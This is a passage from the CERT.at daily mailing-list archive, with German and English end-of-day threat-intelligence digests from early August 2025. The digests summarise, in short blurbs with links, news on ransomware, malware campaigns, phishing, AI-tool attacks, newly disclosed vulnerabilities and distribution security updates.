∗∗∗ Keys to the Kingdom: Erlang/OTP SSH Vulnerability Analysis and Exploits Observed in the Wild ∗∗∗ --------------------------------------------- CVE-2025-32433 allows for remote code execution in sshd for certain versions of Erlang programming language’s OTP. We reproduced this CVE and share our findings. --------------------------------------------- https://unit42.paloaltonetworks.com/erlang-otp-cve-2025-32433/ ∗∗∗ BadCam Attack Turns Trusted Linux Webcams into Stealthy USB Weapons ∗∗∗ --------------------------------------------- A new class of USB-based attacks has come to light. [..] Attackers can now exploit vulnerabilities in commonly used USB webcams running embedded Linux, transforming them into BadUSB devices capable of injecting keystrokes and executing covert operations independently of the host operating system. --------------------------------------------- https://thecyberexpress.com/badcam-linux-webcam/ ===================== = Vulnerabilities = ===================== ∗∗∗ Security updates for Monday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (jackson-annotations, jackson-core, jackson-databind, jackson-jaxrs-providers, and jackson-modules-base and libxml2), Debian (distro-info-data, gnutls28, modsecurity-crs, and node-tmp), Fedora (chromium, incus, perl, perl-Devel-Cover, perl-PAR-Packer, polymake, varnish, and xen), Red Hat (kernel, kernel-rt, and rhc), and SUSE (chromedriver, ffmpeg-4, go1.23, go1.24, go1.25, govulncheck-vulndb, himmelblau, iperf, keylime-ima-policy, net-tools, sqlite3, texmaker, tomcat, and zabbix). --------------------------------------------- https://lwn.net/Articles/1033328/ ∗∗∗ SQUID-2025:1 Buffer Overflow in URN Handling ∗∗∗ --------------------------------------------- https://github.com/squid-cache/squid/security/advisories/GHSA-w4gv-vw3f-29g3 ∗∗∗ Xerox® FreeFlow® Core v8.0.5 ∗∗∗ --------------------------------------------- https://securitydocs.business.xerox.com/wp-content/uploads/2025/08/Xerox-Se… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/

1 0

Tageszusammenfassung - 08.08.2025
by Daily end-of-shift report 08 Aug '25

08 Aug '25

===================== = End-of-Day report = ===================== Timeframe: Donnerstag 07-08-2025 18:00 − Freitag 08-08-2025 18:00 Handler: Guenes Holler Co-Handler: Felician Fuchs ===================== = News = ===================== ∗∗∗ New EDR killer tool used by eight different ransomware groups ∗∗∗ --------------------------------------------- A new Endpoint Detection and Response (EDR) killer that is considered to be the evolution of 'EDRKillShifter,' developed by RansomHub, has been observed in attacks by eight different ransomware gangs. Such tools help ransomware operators turn off security products on breached systems so they can deploy payloads, escalate privileges, attempt lateral movement, and ultimately encrypt devices on the network without being detected. --------------------------------------------- https://www.bleepingcomputer.com/news/security/new-edr-killer-tool-used-by-… ∗∗∗ Why blow up satellites when you can just hack them? ∗∗∗ --------------------------------------------- Four countries have now tested anti-satellite missiles (the US, China, Russia, and India), but it's much easier and cheaper just to hack them. In a briefing at the Black Hat conference in Las Vegas, Milenko Starcik and Andrzej Olchawa from German biz VisionSpace Technologies demonstrated how easy it is by exploiting software vulnerabilities in the software used in the satellites themselves, as well as the ground stations that control them. --------------------------------------------- https://go.theregister.com/feed/www.theregister.com/2025/08/07/balck_hat_sa… ∗∗∗ US confirms takedown of BlackSuit ransomware gang that racked up $370 million in ransoms ∗∗∗ --------------------------------------------- U.S. law enforcement agencies provided new details on an operation that dismantled critical infrastructure used by the BlackSuit ransomware gang after the organization’s leak site was replaced with a takedown banner nearly two weeks ago. The group — which rebranded from its Royal name after a devastating 2023 attack that shut down the city of Dallas — successfully attacked more than 450 entities in the U.S. Since emerging in 2022, the gang secured more than $370 million in ransom payments, according to U.S. investigators. --------------------------------------------- https://therecord.media/us-confirms-blacksuit-takedown ∗∗∗ Abusing Ubuntu 24.04 features for root privilege escalation ∗∗∗ --------------------------------------------- With the recent release of Ubuntu 24.04, we at Snyk Security Labs thought it would be interesting to examine the latest version of this Linux distribution to see if we could find any interesting privilege escalation vulnerabilities. In this post, we have seen that it only takes the leveraging of one small vulnerability, combined with a number of features, to achieve a chain of exploitation resulting in a full privilege escalation. Even where security controls are in place preventing the direct exploitation of a small vulnerability it may still be possible to finesse limited exploitation potential into a much greater impact. --------------------------------------------- https://labs.snyk.io/resources/abusing-ubuntu-root-privilege-escalation/ ∗∗∗ Oops Safari, I think You Spilled Something ∗∗∗ --------------------------------------------- In February 2023, researchers at Exodus Intelligence discovered a bug in the Data Flow Graph (DFG) compiler of WebKit, the browser engine used by Safari. This bug, CVE-2024-44308, was patched by Apple in November 2024. While it was alive, its exploit was chained with PAC and APRR bypasses on Apple Silicon to yield renderer remote code execution capabilities on macOS and iOS. Such capabilities, and many others including LPEs and RCEs on Windows and Linux, are available to Exodus’ customers. --------------------------------------------- https://blog.exodusintel.com/2025/08/04/oops-safari-i-think-you-spilled-som… ∗∗∗ 60 Malicious Ruby Gems Used in Targeted Credential Theft Campaign ∗∗∗ --------------------------------------------- Socket’s Threat Research Team has uncovered a long-running supply chain attack in the RubyGems ecosystem. Since at least March 2023, a threat actor using the aliases zon, nowon, kwonsoonje, and soonje has published 60 malicious gems posing as automation tools for Instagram, Twitter/X, TikTok, WordPress, Telegram, Kakao, and Naver. These gems deliver their advertised functionality, such as bulk posting or engagement, but covertly exfiltrate credentials (usernames and passwords) to threat actor-controlled infrastructure, which classifies them as infostealer malware. --------------------------------------------- https://socket.dev/blog/60-malicious-ruby-gems-used-in-targeted-credential-… ===================== = Vulnerabilities = ===================== ∗∗∗ Security updates for Friday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (gdk-pixbuf2, glibc, kernel, kernel-rt, libxml2, and opentelemetry-collector), Fedora (firefox, mingw-opencv, moby-engine, varnish, webkitgtk, xen, and yarnpkg), Oracle (firefox, gdk-pixbuf2, glibc, kernel, libblockdev, libxml2, python-requests, python3.12-setuptools, and qt5-qt3d), Red Hat (libxml2, pcs, and sudo), and SUSE (agama, chromium, dpkg, ghostscript, iperf, kubo, libIex-3_3-32, libpoppler-cpp2, libsoup, libtiff-devel-32bit, nginx, python-urllib3, ruby2.5, tgt, traefik, and traefik2). --------------------------------------------- https://lwn.net/Articles/1033009/ ∗∗∗ CISA Issues ED 25-02: Mitigate Microsoft Exchange Vulnerability ∗∗∗ --------------------------------------------- Today, CISA issued Emergency Directive (ED) 25-02: Mitigate Microsoft Exchange Vulnerability in response to CVE-2025-53786, a vulnerability in Microsoft Exchange server hybrid deployments. ED 25-02 directs all Federal Civilian Executive Branch (FCEB) agencies with Microsoft Exchange hybrid environments to implement required mitigations by 9:00 AM EDT on Monday, August 11, 2025. This vulnerability presents significant risk to all organizations operating Microsoft Exchange hybrid-joined configurations that have not yet implemented the April 2025 patch guidance. --------------------------------------------- https://www.cisa.gov/news-events/alerts/2025/08/07/cisa-issues-ed-25-02-mit… ∗∗∗ CISA Releases Ten Industrial Control Systems Advisories ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/alerts/2025/08/07/cisa-releases-ten-indust… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 07.08.2025
by Daily end-of-shift report 07 Aug '25

07 Aug '25

===================== = End-of-Day report = ===================== Timeframe: Mittwoch 06-08-2025 18:00 − Donnerstag 07-08-2025 18:00 Handler: Felician Fuchs Co-Handler: Guenes Holler ===================== = News = ===================== ∗∗∗ New Ghost Calls tactic abuses Zoom and Microsoft Teams for C2 operations ∗∗∗ --------------------------------------------- A new post-exploitation command-and-control (C2) evasion method called Ghost Calls abuses TURN servers used by conferencing apps like Zoom and Microsoft Teams to tunnel traffic through trusted infrastructure. --------------------------------------------- https://www.bleepingcomputer.com/news/security/new-ghost-calls-tactic-abuse… ∗∗∗ Wave of 150 crypto-draining extensions hits Firefox add-on store ∗∗∗ --------------------------------------------- A malicious campaign dubbed GreedyBear has snuck onto the Mozilla add-ons store, targeting Firefox users with 150 malicious extensions and stealing an estimated $1,000,000 from unsuspecting victims. --------------------------------------------- https://www.bleepingcomputer.com/news/security/wave-of-150-crypto-draining-… ∗∗∗ Critical Zero-Day Bugs Crack Open CyberArk, HashiCorp Password Vaults ∗∗∗ --------------------------------------------- Secrets managers hold all the keys to an enterprises kingdom. Two popular ones had longstanding, critical, unauthenticated RCE vulnerabilities. --------------------------------------------- https://www.darkreading.com/cybersecurity-operations/critical-zero-day-bugs… ∗∗∗ Researchers Uncover ECScape Flaw in Amazon ECS Enabling Cross-Task Credential Theft ∗∗∗ --------------------------------------------- Cybersecurity researchers have demonstrated an "end-to-end privilege escalation chain" in Amazon Elastic Container Service (ECS) that could be exploited by an attacker to conduct lateral movement, access sensitive data, and seize control of the cloud environment. --------------------------------------------- https://thehackernews.com/2025/08/researchers-uncover-ecscape-flaw-in.html ∗∗∗ How To Find SQL Injection Vulnerabilities in WordPress Plugins and Themes ∗∗∗ --------------------------------------------- SQL Injection (SQLi), a vulnerability almost as old as database-driven web applications themselves (CWE-89), persists as a classic example of failing to neutralize user-supplied input before its used in a SQL query. So why does this well-understood vulnerability type continue to exist? --------------------------------------------- https://www.wordfence.com/blog/2025/08/how-to-find-sql-injection-vulnerabil… ∗∗∗ New Promptware Attack Hijacks User’s Gemini AI Via Google Calendar Invite ∗∗∗ --------------------------------------------- Cybersecurity researchers demonstrate a new attack on Google Gemini AI for Workspace. Discover how a simple calendar invite can be used to perform phishing, steal emails, and even control home appliances. --------------------------------------------- https://hackread.com/promptware-attack-hijack-gemini-ai-google-calendar-inv… ∗∗∗ Unveiling a New Variant of the DarkCloud Campaign ∗∗∗ --------------------------------------------- In early July 2025, a new DarkCloud campaign was observed in the wild by Fortinet’s FortiGuard Labs team. It began with a phishing email containing an attached RAR archive. I subsequently investigated this campaign and conducted a step-by-step analysis. --------------------------------------------- https://feeds.fortinet.com/~/922857380/0/fortinet/blogs~Unveiling-a-New-Var… ∗∗∗ HTTP/1.1 must die: the desync endgame ∗∗∗ --------------------------------------------- Upstream HTTP/1.1 is inherently insecure and regularly exposes millions of websites to hostile takeover. Six years of attempted mitigations have hidden the issue, but failed to fix it. This paper introduces several novel classes of HTTP desync attack capable of mass compromise of user credentials. --------------------------------------------- https://portswigger.net/research/http1-must-die ∗∗∗ Malicious npm Packages Target WhatsApp Developers with Remote Kill Switch ∗∗∗ --------------------------------------------- Two npm packages masquerading as WhatsApp developer libraries include a kill switch that deletes all files if the phone number isn’t whitelisted. --------------------------------------------- https://socket.dev/blog/malicious-npm-packages-target-whatsapp-developers-w… ===================== = Vulnerabilities = ===================== ∗∗∗ 6,500 Axis Servers Expose Remoting Protocol, 4,000 in U.S. Vulnerable to Exploits ∗∗∗ --------------------------------------------- Cybersecurity researchers have disclosed multiple security flaws in video surveillance products from Axis Communications that, if successfully exploited, could expose them to takeover attacks. --------------------------------------------- https://thehackernews.com/2025/08/6500-axis-servers-expose-remoting.html ∗∗∗ Security updates for Thursday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (glibc, kernel, libxml2, python-requests, and python-setuptools), Debian (chromium), Fedora (chromium, firefox, gdk-pixbuf2, iputils, libsoup3, libssh, perl, perl-Devel-Cover, perl-PAR-Packer, polymake, and poppler), Gentoo (Composer and Spreadsheet-ParseExcel), Oracle (glibc, kernel, libxml2, python-setuptools, sqlite, and virt:rhel and virt-devel:rhel), Red Hat (libxml2), SUSE (grub2, libarchive, libgcrypt, and python311), and Ubuntu (cifs-utils and poppler). --------------------------------------------- https://lwn.net/Articles/1032861/ ∗∗∗ Erhöhte Bedrohungsaktivität gegen SonicWall Gen 7 Firewalls mit SSLVPN - Sofortmaßnahmen empfohlen ∗∗∗ --------------------------------------------- Update: 07. August 2025 Ergänzung von technischen Indikatoren für eine forensische Untersuchung möglicherweise betroffener Geräte sowie Informationen zu der angeblich relevanten Schwachstelle. --------------------------------------------- https://www.cert.at/de/warnungen/2025/8/erhohte-bedrohungsaktivitat-gegen-s… ∗∗∗ Sicherheitslücken: Angreifer können IBM Tivoli Monitoring crashen lassen ∗∗∗ --------------------------------------------- IBMs IT-Verwaltungssoftware Tivoli Monitoring ist verwundbar und Angreifer können an zwei Sicherheitslücken ansetzen. Ein Update zum Schließen der Lücken steht zum Download bereit. --------------------------------------------- https://heise.de/-10513072 ∗∗∗ EG4 Electronics EG4 Inverters ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-25-219-07 ∗∗∗ Dreame Technology iOS and Android Mobile Applications ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-25-219-06 ∗∗∗ Packet Power EMX and EG ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-25-219-05 ∗∗∗ Rockwell Automation Arena ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-25-219-04 ∗∗∗ Burk Technology ARC Solo ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-25-219-03 ∗∗∗ Johnson Controls FX80 and FX90 ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-25-219-02 ∗∗∗ Delta Electronics DIAView ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-25-219-01 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 06.08.2025
by Daily end-of-shift report 06 Aug '25

06 Aug '25

===================== = End-of-Day report = ===================== Timeframe: Dienstag 05-08-2025 18:00 − Mittwoch 06-08-2025 18:00 Handler: Felician Fuchs Co-Handler: Guenes Holler ===================== = News = ===================== ∗∗∗ Driver of destruction: How a legitimate driver is being used to take down AV processes ∗∗∗ --------------------------------------------- In an incident response case, Kaspersky experts discovered new malware that terminates AV processes by abusing the legitimate ThrottleStop driver. --------------------------------------------- https://securelist.com/av-killer-exploiting-throttlestop-sys/117026/ ∗∗∗ CISA Adds 3 D-Link Router Flaws to KEV Catalog After Active Exploitation Reports ∗∗∗ --------------------------------------------- The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday added three old security flaws impacting D-Link routers to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation in the wild. --------------------------------------------- https://thehackernews.com/2025/08/cisa-adds-3-d-link-router-flaws-to-kev.ht… ∗∗∗ CERT-UA Warns of HTA-Delivered C# Malware Attacks Using Court Summons Lures ∗∗∗ --------------------------------------------- The Computer Emergency Response Team of Ukraine (CERT-UA) has warned of cyber attacks carried out by a threat actor called UAC-0099 targeting government agencies, the defense forces, and enterprises of the defense-industrial complex in the country. --------------------------------------------- https://thehackernews.com/2025/08/cert-ua-warns-of-hta-delivered-c.html ∗∗∗ GenAI Used For Phishing Websites Impersonating Brazil’s Government ∗∗∗ --------------------------------------------- In this blog post, ThreatLabz explores a campaign that uses generative AI tools like DeepSite AI and BlackBox AI to create malicious replicas of Brazil's State Department of Traffic and Ministry of Education. --------------------------------------------- https://www.zscaler.com/blogs/security-research/genai-used-phishing-website… ∗∗∗ Kriminelle versenden gefälschte Zahlungsaufforderungen im Namen der WKO ∗∗∗ --------------------------------------------- Die Wirtschatfskammer Österreich (WKO) ist erneut Ziel einer Phishing-Attacke geworden. Aktuell kursiert eine betrügerische E-Mail, die vorgibt, von der WKO zu stammen. In der E-Mail wird der Eindruck erweckt, dass eine ausstehende Mitgliedsrechnung bezahlt werden müsse. Das Ziel der Attacke ist es, an persönliche Informationen und Log-in-Daten zu kommen. --------------------------------------------- https://www.watchlist-internet.at/news/kriminelle-versenden-gefaelschte-zah… ∗∗∗ Makop Ransomware Identified in Attacks in South Korea ∗∗∗ --------------------------------------------- AhnLab SEcurity intelligence Center (ASEC) recently identified cases of Makop ransomware attacks targeting South Korean users. The Makop ransomware has been distributed to South Korean users by disguising as resumes or emails related to copyrights for several years. Recently, it has been reported that the ransomware is exploiting RDP for attacks. --------------------------------------------- https://asec.ahnlab.com/en/89397/ ∗∗∗ The Cost of a Call: From Voice Phishing to Data Extortion ∗∗∗ --------------------------------------------- In June, one of Google’s corporate Salesforce instances was impacted by similar UNC6040 activity described in this post. Google responded to the activity, performed an impact analysis and began mitigations. The instance was used to store contact information and related notes for small and medium businesses. --------------------------------------------- https://cloud.google.com/blog/topics/threat-intelligence/voice-phishing-dat… ===================== = Vulnerabilities = ===================== ∗∗∗ Experience Manager: Adobe patcht 90 Tage nicht und bringt nun Notfallupdate ∗∗∗ --------------------------------------------- Da Proof-of-Concept-Code im Umlauf ist, könnten Angriffe auf Adobe Experience Manager bevorstehen. Angreifer können an zwei Sicherheitslücken [..] ansetzen, um Systeme zu attackieren. Die Schwachstellen sind seit April dieses Jahres bekannt, Sicherheitspatches gibt es aber erst jetzt. --------------------------------------------- https://www.heise.de/news/Experience-Manager-Adobe-patcht-90-Tage-nicht-und… ∗∗∗ Security updates for Wednesday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (kernel and python3.12-setuptools), Fedora (perl-Crypt-CBC and unbound), Gentoo (FontForge, GPL Ghostscript, Mozilla Network Security Service (NSS), and PAM), Oracle (gdk-pixbuf2, jq, kernel, mod_security, ncurses, python-requests, and python3-setuptools), Red Hat (python-requests and socat), SUSE (docker, kernel-livepatch-MICRO-6-0-RT_Update_2, kernel-livepatch-MICRO-6-0-RT_Update_4, kernel-livepatch-MICRO-6-0-RT_Update_5, kernel-livepatch-MICRO-6-0-RT_Update_6, kernel-livepatch-MICRO-6-0-RT_Update_7, kernel-livepatch-MICRO-6-0_Update_2, kernel-livepatch-MICRO-6-0_Update_4, kernel-livepatch-MICRO-6-0_Update_5, kernel-livepatch-MICRO-6-0_Update_6, kubeshark-cli, libgcrypt, pam-config, perl, python-requests, python311, and python313), and Ubuntu (linux-raspi). --------------------------------------------- https://lwn.net/Articles/1032700/ ∗∗∗ Docker: Sicherheitsalptraum MCP – sechs Lücken identifiziert ∗∗∗ --------------------------------------------- Die Containerplattform Docker warnt vor Sicherheitsrisiken, die sich durch die Nutzung von MCP-Quellen ergeben und Angreifern leichten Zugriff auf Dateien, Datenbanken, Netzwerk und Secrets eröffnen. Außerdem können die Täter weitreichend Befehle absetzen und schädlichen Code einschleusen. --------------------------------------------- https://heise.de/-10510262 ∗∗∗ Sicherheitsupdates: Root-Attacken auf Dell PowerProtect und Unity möglich ∗∗∗ --------------------------------------------- Um möglichen Attacken vorzubeugen, sollten Admins Dell PowerProtect Data Domain und Unity, UnityVSA sowie Unity XT auf den aktuellen Stand bringen. Geschieht das nicht, können Angreifer unter anderem mit Root-Rechten auf Instanzen zugreifen und diese kompromittieren. --------------------------------------------- https://heise.de/-10511706 ∗∗∗ JVN: Multiple vulnerabilities in Sato label printers CL4/6NX Plus and CL4/6NX-J Plus series ∗∗∗ --------------------------------------------- https://jvn.jp/en/jp/JVN16547726/ ∗∗∗ ZDI-25-771: Trend Micro Apex One Console Command Injection Remote Code Execution Vulnerability ∗∗∗ --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-25-771/ ∗∗∗ ZDI-25-807: (0Day) AOMEI Cyber Backup Missing Authentication for Critical Function Remote Code Execution Vulnerability ∗∗∗ --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-25-807/ ∗∗∗ Stable Channel Update for Desktop ∗∗∗ --------------------------------------------- http://chromereleases.googleblog.com/2025/08/stable-channel-update-for-desk… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 05.08.2025
by Daily end-of-shift report 05 Aug '25

05 Aug '25

===================== = End-of-Day report = ===================== Timeframe: Montag 04-08-2025 18:00 − Dienstag 05-08-2025 18:00 Handler: Felician Fuchs Co-Handler: Alexander Riepl ===================== = News = ===================== ∗∗∗ Android gets patches for Qualcomm flaws exploited in attacks ∗∗∗ --------------------------------------------- Google has released security patches for six vulnerabilities in Androids August 2025 security update, including two Qualcomm flaws exploited in targeted attacks. --------------------------------------------- https://www.bleepingcomputer.com/news/security/android-gets-patches-for-qua… ∗∗∗ Stealing Machine Keys for fun and profit (or riding the SharePoint wave) ∗∗∗ --------------------------------------------- About 10 days ago exploits for Microsoft SharePoint (CVE-2025-53770, CVE-2025-53771) started being publicly abused .. --------------------------------------------- https://isc.sans.edu/diary/Stealing+Machine+Keys+for+fun+and+profit+or+ridi… ∗∗∗ Antivirus vendors fail to spot persistent, nasty, stealthy Linux backdoor ∗∗∗ --------------------------------------------- Plague malware has been around for months without tripping alarms Updated Researchers at German infosec services company Nextron Threat have spotted malware that creates a highly-persistent Linux backdoor and say antivirus engines do not flag the code as malicious. --------------------------------------------- https://www.theregister.com/2025/08/05/plague_linux_backdoor/ ∗∗∗ CrowdStrike investigated 320 North Korean IT worker cases in the past year ∗∗∗ --------------------------------------------- Threat hunters saw North Korean operatives almost daily, reflecting a 220% year-over-year increase in activity, CrowdStrike said in a new report. --------------------------------------------- https://cyberscoop.com/crowdstrike-north-korean-operatives/ ∗∗∗ Mozilla: Phishing-Attacken auf Add-on-Entwickler beobachtet ∗∗∗ --------------------------------------------- Zurzeit haben es Kriminelle auf Add-on-Entwickler abgesehen, die Erweiterungen für Firefox erstellen. --------------------------------------------- https://www.heise.de/news/Mozilla-warnt-vor-Phishing-Attacken-auf-Add-on-En… ∗∗∗ From code to stolen wallets: How hackers are trapping AI development tools ∗∗∗ --------------------------------------------- When AI becomes a target At a time when AI technology is developing rapidly, AI has been increasingly integrated into our daily lives. However, due .. --------------------------------------------- https://blog.360totalsecurity.com/en/from-code-to-stolen-wallets-how-hacker… ∗∗∗ Achtung Fake-Shop: vorwerk-deutschland.de ∗∗∗ --------------------------------------------- Auf vorwerk-deutschland.de freuen sich viele Kund:innen über ein Schnäppchen. Der neue Thermomix TM7 wird dort zu einem günstigeren Preis angeboten. Doch Vorsicht: Es handelt sich um einen Fake-Shop, der nur Zahlung per Vorkasse akzeptiert. Wer hier bestellt, verliert sein Geld und erhält keine Ware. --------------------------------------------- https://www.watchlist-internet.at/news/achtung-fake-shop-vorwerk-deutschlan… ∗∗∗ Ukrainische Hacker erbeuteten Geheimdokumente über das neueste russische Atom-U-Boot ∗∗∗ --------------------------------------------- Die erbeuteten Daten umfassen Besatzungslisten, Einsatzdaten und Baupläne. Laut dem ukrainischen Geheimdienst wurden auch die Schwächen des U-Boots offengelegt --------------------------------------------- https://www.derstandard.at/story/3000000282244/ukrainische-hacker-erbeutete… ∗∗∗ Erhöhte Bedrohungsaktivität gegen SonicWall Gen 7 Firewalls mit SSLVPN - Sofortmaßnahmen empfohlen ∗∗∗ --------------------------------------------- SonicWall berichtet über eine deutliche Zunahme von Sicherheitsvorfällen in den letzten 96 Stunden, die Gen 7 SonicWall Firewalls mit aktiviertem SSLVPN betreffen. Die Bedrohungsaktivität wurde sowohl intern als auch von externen Organisationen und Unternehmen wie Arctic Wolf, Google Mandiant und Huntress gemeldet. Es ist noch nicht .. --------------------------------------------- https://www.cert.at/de/warnungen/2025/8/erhohte-bedrohungsaktivitat-gegen-s… ∗∗∗ From Bing Search to Ransomware: Bumblebee and AdaptixC2 Deliver Akira ∗∗∗ --------------------------------------------- Bumblebee malware has been an initial access tool used by threat actors since late 2021. In 2023 the malware was first reported as using SEO poisoning as a delivery .. --------------------------------------------- https://thedfirreport.com/2025/08/05/from-bing-search-to-ransomware-bumbleb… ∗∗∗ Cursor IDE: Persistent Code Execution via MCP Trust Bypass ∗∗∗ --------------------------------------------- Check Point Research uncovered a persistent remote code execution vulnerability in Cursor, a fast-growing AI-powered coding platform trusted by developers worldwide. MCP Vulnerability Cursor allows attackers to gain long-term, silent access to .. --------------------------------------------- https://blog.checkpoint.com/research/cursor-ide-persistent-code-execution-v… ∗∗∗ Vietnamese-speaking hackers appear to be running global data theft operation through Telegram ∗∗∗ --------------------------------------------- A combination of phishing lures, a previously spotted infostealer and Telegram bots are fueling a campaign by apparent Vietnamese-speaking hackers to capture and sell sensitive data globally. --------------------------------------------- https://therecord.media/pxa-infostealer-telegram-bots-vietnamese-speaking-h… ∗∗∗ Neue Insights zum SharePoint-Gate: Mitarbeiter aus China für die Wartung ∗∗∗ --------------------------------------------- Seit dem SharePoint-Desaster im Juli 2025, bei dem Schwachstellen angegriffen wurden, gibt es fast jeden Tag neue Enthüllungen. Es wurde spekuliert, dass mutmaßlich chinesische Hacker vorab auf interne .. --------------------------------------------- https://www.borncity.com/blog/2025/08/05/neue-insights-zum-sharepoint-gate-… ∗∗∗ Microsoft Recall erfasst weiterhin (Juli 2025) Kreditkartendaten und Passwörter ∗∗∗ --------------------------------------------- Ist es eine Überraschung? Nein, keine Überraschung, sondern zu erwarten. Die Spionagefunktion Recall, die Microsoft auf die Windows-Systeme drückt, erfasst weiterhin Sensitives wie Kreditkartendaten und Passwörter. Und dies, .. --------------------------------------------- https://www.borncity.com/blog/2025/08/05/microsoft-recall-erfasst-weiterhin… ∗∗∗ Detection Engineering: Practicing Detection-as-Code – Validation – Part 3 ∗∗∗ --------------------------------------------- In this part, we focus on implementing validation checks to improve consistency and ensure a minimum level of quality within the detection repository. Setting up validation pipelines is a key step, as it helps enforce the defined standards, reduce errors, and ensure that detections are reliable and consistent. --------------------------------------------- https://blog.nviso.eu/2025/08/05/detection-engineering-practicing-detection… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 04.08.2025
by Daily end-of-shift report 04 Aug '25

04 Aug '25

===================== = End-of-Day report = ===================== Timeframe: Freitag 01-08-2025 18:00 − Montag 04-08-2025 18:00 Handler: Felician Fuchs Co-Handler: Alexander Riepl ===================== = News = ===================== ∗∗∗ Pi-hole discloses data breach triggered by WordPress plugin flaw ∗∗∗ --------------------------------------------- Pi-hole, a popular network-level ad-blocker, has disclosed that donor names and email addresses were exposed through a security vulnerability in the GiveWP WordPress donation plugin. --------------------------------------------- https://www.bleepingcomputer.com/news/security/pi-hole-discloses-data-breac… ∗∗∗ Mozilla warns of phishing attacks targeting add-on developers ∗∗∗ --------------------------------------------- Mozilla has warned browser extension developers of an active phishing campaign targeting accounts on its official AMO (addons.mozilla.org) repository. --------------------------------------------- https://www.bleepingcomputer.com/news/security/mozilla-warns-of-phishing-at… ∗∗∗ New Plague Linux malware stealthily maintains SSH access ∗∗∗ --------------------------------------------- A newly discovered Linux malware, which has evaded detection for over a year, allows attackers to gain persistent SSH access and bypass authentication on compromised systems. --------------------------------------------- https://www.bleepingcomputer.com/news/security/new-plague-malware-backdoors… ∗∗∗ Exchange: China wirft den USA Militär-Hacking vor ∗∗∗ --------------------------------------------- China beschuldigt US-Geheimdienste, über ein Jahr lang Microsoft Exchange-Schwachstellen ausgenutzt zu haben, um Militärdaten zu stehlen. --------------------------------------------- https://www.golem.de/news/exchange-china-wirft-den-usa-militaer-hacking-vor… ∗∗∗ CISA roasts unnamed critical national infrastructure body for shoddy security hygiene ∗∗∗ --------------------------------------------- Plaintext passwords, shared admin accounts, and insufficient logging rampant at mystery org CISA is using the findings from a recent probe of an unidentified critical infrastructure organization to warn about the dangers of getting cybersecurity seriously wrong. --------------------------------------------- https://go.theregister.com/feed/www.theregister.com/2025/08/02/cisa_coast_g… ∗∗∗ Lazarus Group rises again, this time with malware-laden fake FOSS ∗∗∗ --------------------------------------------- Software supply chain management vendor Sonatype last week published research in which it claimed that Lazarus Group has created hundreds of “shadow downloads” that appear to be popular open source software development tools but are full of malware. --------------------------------------------- https://go.theregister.com/feed/www.theregister.com/2025/08/04/infosec_in_b… ∗∗∗ Gefälschte Rückerstattungs-Mails im Namen der WKO ∗∗∗ --------------------------------------------- Derzeit werden E-Mails mit dem Betreff „Ihr möglicher Erstattungsbetrag von bis zu 476 Euro“ an zahlreiche Mitglieder der Wirtschaftskammer Österreich (WKO) versendet. Darin wird behauptet, dass möglicherweise ein Rückerstattungsanspruch der Mitgliederbeiträge besteht, den man über einen Link prüfen kann. Achtung: Der Link führt zu einer betrügerischen Website, auf der persönliche Daten gestohlen werden. --------------------------------------------- https://www.watchlist-internet.at/news/betruegerische-e-mails-zu-rueckersta… ∗∗∗ Akira Ransomware Exploiting Potential Zero-Day in SonicWall SSL VPN ∗∗∗ --------------------------------------------- Artic Wolf also suggest that the attacks could be exploiting an undetermined security flaw in the appliances, meaning a Zero-Day vulnerability, given that some of the incidents affected SonicWall devices which were fully patched. --------------------------------------------- https://www.truesec.com/hub/blog/akira-ransomware-exploiting-potential-zero… ∗∗∗ Doch Sicherheitsvorfall bei Logitech-Partnerliste ∗∗∗ --------------------------------------------- Es hat einen Sicherheitsvorfall bei einem Dienstleister gegeben, der für die Firma Logitech die Logitech-Partner betreut. Logitech-Partner erhielten die Tage eine Betrugs-Mail, die vor dem Risiko eines Angriffs auf eine MetaMask-Wallet warnte, aber einen Phishing-Link enthielt. --------------------------------------------- https://www.borncity.com/blog/2025/08/03/doch-sicherheitsvorfall-bei-logite… ∗∗∗ New Attack Uses Windows Shortcut Files to Install REMCOS Backdoor ∗∗∗ --------------------------------------------- Security firm Point Wild has exposed a new malware campaign using malicious LNK files to install the REMCOS backdoor. This report details how attackers disguise files to gain full system control. --------------------------------------------- https://hackread.com/attack-windows-shortcut-files-install-remcos-backdoor/ ∗∗∗ When Flatpak’s Sandbox Cracks: Real‑Life Security Issues Beyond the Ideal ∗∗∗ --------------------------------------------- Flatpak’s sandbox model is robust in design, but imperfect in deployment. Sandboxes dissolved through misconfiguration, vulnerabilities like CVE‑2024‑32462, and symlink exploits illustrate the friction between ideal and actual protection. --------------------------------------------- https://www.linuxjournal.com/content/when-flatpaks-sandbox-cracks-real-life… ===================== = Vulnerabilities = ===================== ∗∗∗ Sicherheitsupdate: Phishingangriffe auf IBM Operational Decision Manager möglich ∗∗∗ --------------------------------------------- IBMs Businesstool Operational Decision Manager ist verwundbar. In aktuellen Versionen haben die Entwickler zwei Sicherheitslücken geschlossen. --------------------------------------------- 